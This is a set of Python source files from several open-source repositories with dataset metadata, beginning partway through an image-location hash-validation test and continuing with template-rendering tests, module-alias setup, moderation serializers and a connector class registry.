'os_hash_algo': orig_image['os_hash_algo']},
'metadata': {},
'url': '%s#new' % CONF.image.http_image}
self._update_image_with_retries(orig_image['id'],
[dict(add='/locations/-',
value=new_loc)])
# Setting the same exact values on a new location should work
image = self.client.show_image(orig_image['id'])
self.assertEqual(2, len(image['locations']))
self.assertEqual(orig_image['checksum'], image['checksum'])
self.assertEqual(orig_image['os_hash_value'], image['os_hash_value'])
self.assertEqual(orig_image['os_hash_algo'], image['os_hash_algo'])
self.assertNotIn('validation_data', image['locations'][0])
self.assertNotIn('validation_data', image['locations'][1])
@decorators.idempotent_id('f3ce99c2-9ffb-4b9f-b2cb-876929382553')
def test_set_location_with_hash_not_matching(self):
orig_image = self._check_set_location_with_hash()
values = {
'checksum': '2' * 32,
'os_hash_value': 'beefdead' * 16,
'os_hash_algo': 'sha256',
}
# Try to set a new location with one each of the above
# substitutions
for k, v in values.items():
new_loc = {
'validation_data': {
'checksum': orig_image['checksum'],
'os_hash_value': orig_image['os_hash_value'],
'os_hash_algo': orig_image['os_hash_algo']},
'metadata': {},
'url': '%s#new' % CONF.image.http_image}
new_loc['validation_data'][k] = v
# This should always fail due to the mismatch
self.assertRaises(lib_exc.Conflict,
self._update_image_with_retries,
orig_image['id'],
[dict(add='/locations/-', value=new_loc)])
# Now try to add a new location with all of the substitutions,
# which should also fail
new_loc['validation_data'] = values
self.assertRaises(lib_exc.Conflict,
self._update_image_with_retries,
orig_image['id'],
[dict(add='/locations/-', value=new_loc)])
# Make sure nothing has changed on our image after all the
# above failures
image = self.client.show_image(orig_image['id'])
self.assertEqual(1, len(image['locations']))
self.assertEqual(orig_image['checksum'], image['checksum'])
self.assertEqual(orig_image['os_hash_value'], image['os_hash_value'])
self.assertEqual(orig_image['os_hash_algo'], image['os_hash_algo'])
self.assertNotIn('validation_data', image['locations'][0])
---
blob_id: b8c59cf0b9d7cde58786b8b40f48b2b1024e0ea5
directory_id: 5dc77586e3e0f9de1f032fd2ca68494d8e58928f
path: /tests/render/test_styled_string_template.py
content_id: 9039382c2a3f23993d48fbcac2b35850bd050713
detected_licenses: ["Apache-2.0"]
license_type: permissive
repo_name: great-expectations/great_expectations
snapshot_id: dd7c22e6277d6b08bee3ff38a015e6e8cd434df6
revision_id: b0290e2fd2aa05aec6d7d8871b91cb4478e9501d
branch_name: refs/heads/develop
visit_date: 2023-09-04T09:30:26.395518
revision_date: 2023-09-02T00:00:13
committer_date: 2023-09-02T00:00:13
github_id: 103,071,520
star_events_count: 8,931
fork_events_count: 1,535
gha_license_id: Apache-2.0
gha_event_created_at: 2023-09-14T19:57:16
gha_created_at: 2017-09-11T00:18:46
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 6,046
extension: py
filename: test_styled_string_template.py
content:
import pytest
from great_expectations.render.view import DefaultJinjaPageView
# module level markers
pytestmark = pytest.mark.unit
def test_render_template():
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == "<span>It was the best of times; it was the worst of times.</span>".replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
"styling": {
"default": {
"classes": ["badge", "badge-warning"],
}
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == '<span>It was the <span class="badge badge-warning" >best</span> of times; it was the <span class="badge badge-warning" >worst</span> of times.</span>'.replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
"styling": {
"default": {
"classes": ["badge", "badge-warning"],
},
"params": {
"first_adj": {
"classes": ["badge-error"],
}
},
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == '<span>It was the <span class="badge-error" >best</span> of times; it was the <span class="badge badge-warning" >worst</span> of times.</span>'.replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
"styling": {
"params": {
"first_adj": {
"classes": ["badge", "badge-warning"],
}
}
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == '<span>It was the <span class="badge badge-warning" >best</span> of times; it was the worst of times.</span>'.replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
"styling": {
"params": {
"first_adj": {
"classes": ["badge", "badge-warning"],
"attributes": {"role": "alert"},
"styles": {"padding": "5px"},
}
}
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == '<span>It was the <span class="badge badge-warning" role="alert" style="padding:5px;" >best</span> of times; it was the worst of times.</span>'.replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
def test_render_template_with_extra_dollar_signs_in_template():
result = DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times. Blahhh$hhhh. $Bloooop. "
"Bleep$.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
}
)
assert result.replace(" ", "").replace("\t", "").replace(
"\n", ""
) == "<span>It was the best of times; it was the worst of times. Blahhh$hhhh. $Bloooop. Bleep$.</span>".replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
result = DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times. Blahhh$$$hhhh. $$Bloooop. Bleep$$$$$.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
}
)
assert result.replace(" ", "").replace("\t", "").replace(
"\n", ""
) == "<span>It was the best of times; it was the worst of times. Blahhh$$$hhhh. $$Bloooop. Bleep$$$$$.</span>".replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
def test_render_template_with_extra_dollar_signs_in_param_values():
result = DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times. Blahhh$hhhh. $Bloooop. "
"Bleep$.",
"params": {
"first_adj": "$best$",
"second_adj": "$$worst$",
},
}
)
assert result.replace(" ", "").replace("\t", "").replace(
"\n", ""
) == "<span>It was the $best$ of times; it was the $$worst$ of times. Blahhh$hhhh. $Bloooop. Bleep$.</span>".replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
---
blob_id: cccc1c8ec48d734df5cc623351e5b421cc62422a
directory_id: dcb823e295bb94de99a89dd4d69314186b9351b2
path: /bin/__init__.py
content_id: b4f7cd0dbf495166363e78600c412b91a4d4cdc1
detected_licenses: ["MIT"]
license_type: permissive
repo_name: ellisk42/ec
snapshot_id: caae2ad9fa7892b2fc456f0d82ee4e3e394ebeb6
revision_id: cb0e63f5c33cd2de360b791038b0f5272750270e
branch_name: refs/heads/master
visit_date: 2023-07-05T22:31:26.762022
revision_date: 2022-03-16T17:45:10
committer_date: 2022-03-16T17:45:10
github_id: 117,295,639
star_events_count: 371
fork_events_count: 137
gha_license_id: MIT
gha_event_created_at: 2023-02-16T20:24:12
gha_created_at: 2018-01-12T22:55:36
gha_language: Slash
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 2,583
extension: py
filename: __init__.py
content:
"""
EC codebase scripts and executables
These scripts should be run from the root of the repository, e.g.
python bin/<script>
For more usage examples, see the official_figures and official_experiments documents.
Module mapping details:
TODO: remove module mapping code when backwards-compatibility is no longer required.
The below module mapping is required for backwards-compatibility with old pickle files
generated from before the EC codebase refactor. New files added to the codebase do not
need to be added to the mapping, but if the existing modules are moved, then the
mapping needs to be updated to reflect the move or rename.
The mapping uses the following pattern:
sys.modules[<old module path>] = <new module reference>
This is because the previous structure of the codebase was completely flat, and after refactoring
to a hierarchical layout, loading previous pickle files no longer works properly. It is important
to retain the ability to read old pickle files generated from official experiments. As a workaround,
the old module paths are included below. A preferable alternative would be to export program state
into JSON files instead of pickle files to avoid issues where the underlying classes change, so that
could be a future improvement to this project. Until then, we use the module mapping workaround.
For more info, see this StackOverflow answer: https://stackoverflow.com/a/2121918/2573242
"""
import sys
from bin import analyzeDepth
from bin import compiledDriver
from bin import examineFrontier
from bin import graphs
from bin import launch
from bin import logReports
from bin import physics
from bin import rational
from bin import scientificLaws
from bin import symmetryBreaking
from bin import taskRankGraphs
from bin.deprecated import compressionGraph, evolution, extractDeepcoderDataset, python_server, symbolicRegression
sys.modules['analyzeDepth'] = analyzeDepth
sys.modules['compiledDriver'] = compiledDriver
sys.modules['compressionGraph'] = compressionGraph
sys.modules['evolution'] = evolution
sys.modules['examineFrontier'] = examineFrontier
sys.modules['extractDeepcoderDataset'] = extractDeepcoderDataset
sys.modules['graphs'] = graphs
sys.modules['launch'] = launch
sys.modules['logReports'] = logReports
sys.modules['physics'] = physics
sys.modules['python_server'] = python_server
sys.modules['rational'] = rational
sys.modules['scientificLaws'] = scientificLaws
sys.modules['symbolicRegression'] = symbolicRegression
sys.modules['symmetryBreaking'] = symmetryBreaking
sys.modules['taskRankGraphs'] = taskRankGraphs
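# A minimal sketch (an editor's illustration, not part of the original file)
# of why the aliasing above matters. Unpickling resolves classes by the module
# path recorded at pickle time, so an object pickled when its class lived in a
# top-level 'graphs' module fails to load once the class moves to 'bin.graphs'
# unless the old path is aliased first:
#
#     import pickle
#     import sys
#     from bin import graphs
#     sys.modules['graphs'] = graphs  # alias the old path to the new module
#     with open('old_experiment.pickle', 'rb') as f:  # hypothetical file
#         state = pickle.load(f)  # 'graphs.<Class>' now resolves correctly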
---
blob_id: 0bfce6589940c53a78a5741b6d61ff9461f05e43
directory_id: 0032d988541e85c47b5034c20ecf88220dde5a95
path: /openbook_moderation/views/moderated_objects/serializers.py
content_id: 874e22412091ff2067a19f4e22ed8a09428fdb96
detected_licenses: ["MIT", "LicenseRef-scancode-unknown-license-reference"]
license_type: permissive
repo_name: OkunaOrg/okuna-api
snapshot_id: eabd37fef9d2be59b590ed8d72bee084ac377997
revision_id: f87d8e80d2f182c01dbce68155ded0078ee707e4
branch_name: refs/heads/master
visit_date: 2022-02-04T21:31:10.577601
revision_date: 2021-12-28T18:20:39
committer_date: 2021-12-28T18:20:39
github_id: 151,052,951
star_events_count: 185
fork_events_count: 92
gha_license_id: MIT
gha_event_created_at: 2022-01-13T01:00:40
gha_created_at: 2018-10-01T07:44:46
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 2,113
extension: py
filename: serializers.py
content:
from django.conf import settings
from rest_framework import serializers
from openbook_communities.validators import community_name_exists, community_name_characters_validator
from openbook_moderation.models import ModeratedObject
class GetGlobalModeratedObjectsSerializer(serializers.Serializer):
max_id = serializers.IntegerField(
required=False,
)
count = serializers.IntegerField(
required=False,
max_value=20
)
types = serializers.MultipleChoiceField(
choices=[ModeratedObject.OBJECT_TYPE_POST, ModeratedObject.OBJECT_TYPE_POST_COMMENT,
ModeratedObject.OBJECT_TYPE_COMMUNITY,
ModeratedObject.OBJECT_TYPE_USER,
ModeratedObject.OBJECT_TYPE_HASHTAG, ], required=False)
statuses = serializers.MultipleChoiceField(
choices=[ModeratedObject.STATUS_REJECTED, ModeratedObject.STATUS_PENDING,
ModeratedObject.STATUS_APPROVED, ], required=False)
verified = serializers.BooleanField(
required=False,
)
approved = serializers.BooleanField(
required=False,
)
class GetCommunityModeratedObjectsSerializer(serializers.Serializer):
max_id = serializers.IntegerField(
required=False,
)
count = serializers.IntegerField(
required=False,
max_value=20
)
types = serializers.MultipleChoiceField(
choices=[ModeratedObject.OBJECT_TYPE_POST, ModeratedObject.OBJECT_TYPE_POST_COMMENT, ], required=False)
statuses = serializers.MultipleChoiceField(
choices=[ModeratedObject.STATUS_REJECTED, ModeratedObject.STATUS_PENDING,
ModeratedObject.STATUS_APPROVED, ], required=False)
verified = serializers.BooleanField(
required=False,
)
approved = serializers.BooleanField(
required=False,
)
community_name = serializers.CharField(max_length=settings.COMMUNITY_NAME_MAX_LENGTH,
allow_blank=False,
validators=[community_name_characters_validator, community_name_exists])
---
blob_id: 232a2418736a182e62f90dece9d5508fd79d1929
directory_id: e3bb1df7fa4c51900dec7e9ddf5295e1a80938bd
path: /test/hummingbot/connector/derivative/gate_io_perpetual/test_gate_io_perpetual_utils.py
content_id: a27837cd290e6d3b098fe77d94a63725d1ed4c3f
detected_licenses: ["Apache-2.0"]
license_type: permissive
repo_name: CoinAlpha/hummingbot
snapshot_id: 0d1e2bd94de1280748647108c7d7800a09546eb8
revision_id: c3f101759ab7e7a2165cd23a3a3e94c90c642a9b
branch_name: refs/heads/development
visit_date: 2023-09-01T11:24:43.322137
revision_date: 2023-08-31T03:08:06
committer_date: 2023-08-31T03:08:06
github_id: 439,330,952
star_events_count: 135
fork_events_count: 98
gha_license_id: Apache-2.0
gha_event_created_at: 2023-08-30T13:55:08
gha_created_at: 2021-12-17T12:50:42
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 84
extension: py
filename: test_gate_io_perpetual_utils.py
content:
from unittest import TestCase
class GateIoPerpetualUtilsTests(TestCase):
pass
---
blob_id: 7b5830bd4a8b16c6fc58e8e5a9532bf1636b83f1
directory_id: fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
path: /dts/airbyte/airbyte-cdk/python/airbyte_cdk/sources/declarative/parsers/class_types_registry.py
content_id: 49328c7751c98e324f2425b379f97956bea0e25d
detected_licenses: ["MIT", "Apache-2.0", "BSD-3-Clause", "Elastic-2.0"]
license_type: permissive
repo_name: alldatacenter/alldata
snapshot_id: 7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
revision_id: 8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
branch_name: refs/heads/master
visit_date: 2023-08-05T07:32:25.442740
revision_date: 2023-08-03T13:17:24
committer_date: 2023-08-03T13:17:24
github_id: 213,321,771
star_events_count: 774
fork_events_count: 250
gha_license_id: Apache-2.0
gha_event_created_at: 2023-09-06T17:35:32
gha_created_at: 2019-10-07T07:36:18
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 5,884
extension: py
filename: class_types_registry.py
content:
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from typing import Mapping, Type
from airbyte_cdk.sources.declarative.auth.declarative_authenticator import NoAuth
from airbyte_cdk.sources.declarative.auth.oauth import DeclarativeOauth2Authenticator
from airbyte_cdk.sources.declarative.auth.token import (
ApiKeyAuthenticator,
BasicHttpAuthenticator,
BearerAuthenticator,
SessionTokenAuthenticator,
)
from airbyte_cdk.sources.declarative.checks import CheckStream
from airbyte_cdk.sources.declarative.datetime.min_max_datetime import MinMaxDatetime
from airbyte_cdk.sources.declarative.declarative_stream import DeclarativeStream
from airbyte_cdk.sources.declarative.extractors import RecordFilter
from airbyte_cdk.sources.declarative.extractors.dpath_extractor import DpathExtractor
from airbyte_cdk.sources.declarative.extractors.record_selector import RecordSelector
from airbyte_cdk.sources.declarative.incremental.datetime_based_cursor import DatetimeBasedCursor
from airbyte_cdk.sources.declarative.interpolation.interpolated_boolean import InterpolatedBoolean
from airbyte_cdk.sources.declarative.interpolation.interpolated_string import InterpolatedString
from airbyte_cdk.sources.declarative.partition_routers.list_partition_router import ListPartitionRouter
from airbyte_cdk.sources.declarative.partition_routers.substream_partition_router import ParentStreamConfig, SubstreamPartitionRouter
from airbyte_cdk.sources.declarative.requesters import RequestOption
from airbyte_cdk.sources.declarative.requesters.error_handlers import HttpResponseFilter
from airbyte_cdk.sources.declarative.requesters.error_handlers.backoff_strategies.constant_backoff_strategy import ConstantBackoffStrategy
from airbyte_cdk.sources.declarative.requesters.error_handlers.backoff_strategies.exponential_backoff_strategy import (
ExponentialBackoffStrategy,
)
from airbyte_cdk.sources.declarative.requesters.error_handlers.backoff_strategies.wait_time_from_header_backoff_strategy import (
WaitTimeFromHeaderBackoffStrategy,
)
from airbyte_cdk.sources.declarative.requesters.error_handlers.backoff_strategies.wait_until_time_from_header_backoff_strategy import (
WaitUntilTimeFromHeaderBackoffStrategy,
)
from airbyte_cdk.sources.declarative.requesters.error_handlers.composite_error_handler import CompositeErrorHandler
from airbyte_cdk.sources.declarative.requesters.error_handlers.default_error_handler import DefaultErrorHandler
from airbyte_cdk.sources.declarative.requesters.http_requester import HttpRequester
from airbyte_cdk.sources.declarative.requesters.paginators.default_paginator import DefaultPaginator
from airbyte_cdk.sources.declarative.requesters.paginators.no_pagination import NoPagination
from airbyte_cdk.sources.declarative.requesters.paginators.strategies.cursor_pagination_strategy import CursorPaginationStrategy
from airbyte_cdk.sources.declarative.requesters.paginators.strategies.offset_increment import OffsetIncrement
from airbyte_cdk.sources.declarative.requesters.paginators.strategies.page_increment import PageIncrement
from airbyte_cdk.sources.declarative.requesters.request_options import InterpolatedRequestOptionsProvider
from airbyte_cdk.sources.declarative.retrievers.simple_retriever import SimpleRetriever
from airbyte_cdk.sources.declarative.schema.inline_schema_loader import InlineSchemaLoader
from airbyte_cdk.sources.declarative.schema.json_file_schema_loader import JsonFileSchemaLoader
from airbyte_cdk.sources.declarative.spec import Spec
from airbyte_cdk.sources.declarative.stream_slicers.cartesian_product_stream_slicer import CartesianProductStreamSlicer
from airbyte_cdk.sources.declarative.transformations import RemoveFields
from airbyte_cdk.sources.declarative.transformations.add_fields import AddedFieldDefinition, AddFields
"""
CLASS_TYPES_REGISTRY contains a mapping of developer-friendly string -> class, abstracting away the specific class being referred to
"""
CLASS_TYPES_REGISTRY: Mapping[str, Type] = {
"AddedFieldDefinition": AddedFieldDefinition,
"AddFields": AddFields,
"ApiKeyAuthenticator": ApiKeyAuthenticator,
"BasicHttpAuthenticator": BasicHttpAuthenticator,
"BearerAuthenticator": BearerAuthenticator,
"CartesianProductStreamSlicer": CartesianProductStreamSlicer,
"CheckStream": CheckStream,
"CompositeErrorHandler": CompositeErrorHandler,
"ConstantBackoffStrategy": ConstantBackoffStrategy,
"CursorPagination": CursorPaginationStrategy,
"DatetimeBasedCursor": DatetimeBasedCursor,
"DeclarativeStream": DeclarativeStream,
"DefaultErrorHandler": DefaultErrorHandler,
"DefaultPaginator": DefaultPaginator,
"DpathExtractor": DpathExtractor,
"ExponentialBackoffStrategy": ExponentialBackoffStrategy,
"HttpRequester": HttpRequester,
"HttpResponseFilter": HttpResponseFilter,
"InlineSchemaLoader": InlineSchemaLoader,
"InterpolatedBoolean": InterpolatedBoolean,
"InterpolatedRequestOptionsProvider": InterpolatedRequestOptionsProvider,
"InterpolatedString": InterpolatedString,
"JsonFileSchemaLoader": JsonFileSchemaLoader,
"ListPartitionRouter": ListPartitionRouter,
"MinMaxDatetime": MinMaxDatetime,
"NoAuth": NoAuth,
"NoPagination": NoPagination,
"OAuthAuthenticator": DeclarativeOauth2Authenticator,
"OffsetIncrement": OffsetIncrement,
"PageIncrement": PageIncrement,
"ParentStreamConfig": ParentStreamConfig,
"RecordFilter": RecordFilter,
"RecordSelector": RecordSelector,
"RequestOption": RequestOption,
"RemoveFields": RemoveFields,
"SimpleRetriever": SimpleRetriever,
"Spec": Spec,
"SubstreamPartitionRouter": SubstreamPartitionRouter,
"SessionTokenAuthenticator": SessionTokenAuthenticator,
"WaitUntilTimeFromHeader": WaitUntilTimeFromHeaderBackoffStrategy,
"WaitTimeFromHeader": WaitTimeFromHeaderBackoffStrategy,
}
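# A hypothetical usage sketch (an editor's illustration, not Airbyte source):
# a manifest parser can resolve a component's declared type string to its
# implementation class via the registry before instantiating it.
#
#     class_name = "DpathExtractor"  # e.g. read from a declarative manifest
#     try:
#         component_cls = CLASS_TYPES_REGISTRY[class_name]
#     except KeyError:
#         raise ValueError(f"Unknown declarative component: {class_name}")
#     # constructor arguments below are illustrative, not the real signature
#     extractor = component_cls(field_path=["data"], parameters={}, config={})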
---